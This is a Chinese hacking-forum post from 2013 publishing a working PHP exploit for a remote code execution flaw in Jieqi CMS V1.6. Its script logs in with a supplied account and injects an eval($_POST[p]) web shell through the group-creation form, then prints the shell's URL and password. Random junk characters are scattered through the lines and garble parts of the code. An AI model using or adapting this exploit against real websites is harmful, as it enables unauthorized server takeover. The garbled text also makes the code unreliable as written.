找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2099|回复: 0
打印 上一主题 下一主题

Jieqi(杰奇)CMS V1.6 PHP代码执行0day漏洞EXP

[复制链接]
跳转到指定楼层
楼主
发表于 2013-2-23 11:28:09 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
杰奇网站管理系统(简称 JIEQI CMS,中国国家版权局著作权登记号:2006SR03382)是一套模块化的网站架设系统,具备简单灵活、性能卓越、安全可靠等特性。我们为大家提供了目前最流行的杰奇小说连载系统、杰奇原创漫画系统及数字出版解决方案,并提供各类网站定制服务。2 x) |: b6 d$ q5 [7 H7 \
* _4 _) i& P" R  `+ n; ^

$ ^" E! t6 e) C) F该系统存在多个远程安全漏洞,今天报告的这个是1.6版本的一个远程代码执行漏洞,应该有2年多历史了。
$ e. r2 h+ x6 A. A6 A' r* Z8 _ 需要有一个能创建圈子的用户。
6 Z$ }  u4 P0 [4 q$ i+ c. A $ j0 m9 ?: @+ s
<?php6 K0 C% K, ~3 ]6 k( x8 ]
, a' l5 l4 f. z7 [
print_r('/ }6 ~) T2 v. T5 V/ g" x: b. T
+---------------------------------------------------------------------------+
- U) t, O. V7 Q: qJieqi CMS V1.6 PHP Code Injection Exploit6 B$ W' E' M9 l9 t* c# \
by flyh4t8 `9 ^- @% ?& c1 i7 }% u
mail: phpsec at hotmail dot com
! O& @: l" @1 e( W+ [" w% }2 qteam: http://www.wolvez.org% Q  P: f* t+ G* D9 d. p( V
+---------------------------------------------------------------------------+9 u+ H4 A1 _0 M* F4 d# l
'); /**4 m- D, G& c8 y% [) B- Y
* works regardless of php.ini settings& ~, G" n0 r* s# f! _
*/ if ($argc < 5) { print_r('$ y, y- h5 v( j8 [& e
+---------------------------------------------------------------------------+8 j* X0 z" v" C2 d8 Z
Usage: php '.$argv[0].' host path username
, `; r# K/ v9 S3 C$ hhost:      target server (ip/hostname)' u* N9 L5 e6 z( |( D, K+ C1 n! D
path:      path to jieqicms . Q* i; T5 S& b6 K& l- e! f' u/ }3 [
uasename:  a username who can create group
, Y; G5 h8 e' k* kExample:/ v' U/ P5 X/ p; h+ f
php '.$argv[0].' localhost /jieqicmsv1.6/ vipuser1 password# H$ f' ^" Z& h# p0 r7 L$ I
+---------------------------------------------------------------------------+
$ j( _& d" g6 J6 X, Y, ^'); exit; } error_reporting(7); ini_set('max_execution_time', 0); $host = $argv[1]; $path = $argv[2]; $username = $argv[3]; $password = $argv[4]; /*get cookie*/ $cookie_jar_index = 'cookie.txt'; $url1 = "http://$host/$path/login.php"; $params = "password=$password&username=$username&usecookie=86400&submit=%26%23160%3B%B5%C7%26%23160%3B%26%23160%3B%C2%BC%26%23160%3B&action=login&jumpreferer=1"; $curl1 = curl_init(); curl_setopt($curl1, CURLOPT_URL, $url1); curl_setopt($curl1, CURLOPT_COOKIEJAR, $cookie_jar_index); curl_setopt($curl1, CURLOPT_POST, 1); curl_setopt($curl1, CURLOPT_POSTFIELDS, $params); ob_start(); $data1 = curl_exec($curl1); if ($data1 === FALSE) { echo "cURL Error: " . curl_error($ch); exit('exploit failed'); } curl_close($curl1); ob_clean(); /*get shell*/ $params ='-----------------------------23281168279961. y0 S/ R9 t) j% U8 ?6 t6 Y
Content-Disposition: form-data; name="gname"1 h: I) Q. F$ [

4 P0 R' W8 L8 a8 B+ }'; $params .="';"; $params .='eval($_POST[p]);//flyh4t2 y% O1 _  H* f* ^
-----------------------------23281168279961, X0 a* a6 _9 Q0 M% v4 T' g
Content-Disposition: form-data; name="gcatid". d1 D8 X/ f6 p- U" z
& [0 @3 [) @  Y; J/ u+ X
1
8 s5 [/ |* L# u2 ]-----------------------------232811682799617 C! Y' ^. \6 _" T9 r
Content-Disposition: form-data; name="gaudit"
9 d3 K9 C' z( M2 B
0 z" \4 t. r4 H# o15 G( t& Z' M6 [9 n5 k8 x7 O3 M$ x
-----------------------------23281168279961
* d- |" Y; K) b1 \Content-Disposition: form-data; name="gbrief"- x' d5 @( U8 o
' P) }5 ^. W9 Q! b, ?: ?5 s
1
" u3 A7 Z2 E. ^2 J! E! D-----------------------------23281168279961--% ~0 Q7 D* y( M  M
'; $url2 = "http://$host/$path/modules/group/create.php"; $curl2 = curl_init(); $header =array( 'Content-Type: multipart/form-data; boundary=---------------------------23281168279961' ); curl_setopt($curl2, CURLOPT_URL, $url2); curl_setopt($curl2, CURLOPT_HTTPHEADER, $header); curl_setopt($curl2, CURLOPT_COOKIEFILE, $cookie_jar_index); curl_setopt($curl2, CURLOPT_POST, 1); curl_setopt($curl2, CURLOPT_POSTFIELDS, $params); ob_start(); curl_exec($curl2); curl_close($curl2); $resp = ob_get_contents(); //$rs就是返回的内容 ob_clean(); www.2cto.com
3 \4 z0 [6 b& Q& {' @: l 2 X9 x% `5 N) S, o; [1 v0 b- H- v  g
preg_match('/g=([0-9]{1,4})/', $resp, $shell); //print_r($shell); //print_r($resp); $url = "http://$host/$path/files/group/userdir/0/$shell[1]/info.php"; echo "view you shell here(password:p)\r\n" ; echo $url;
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表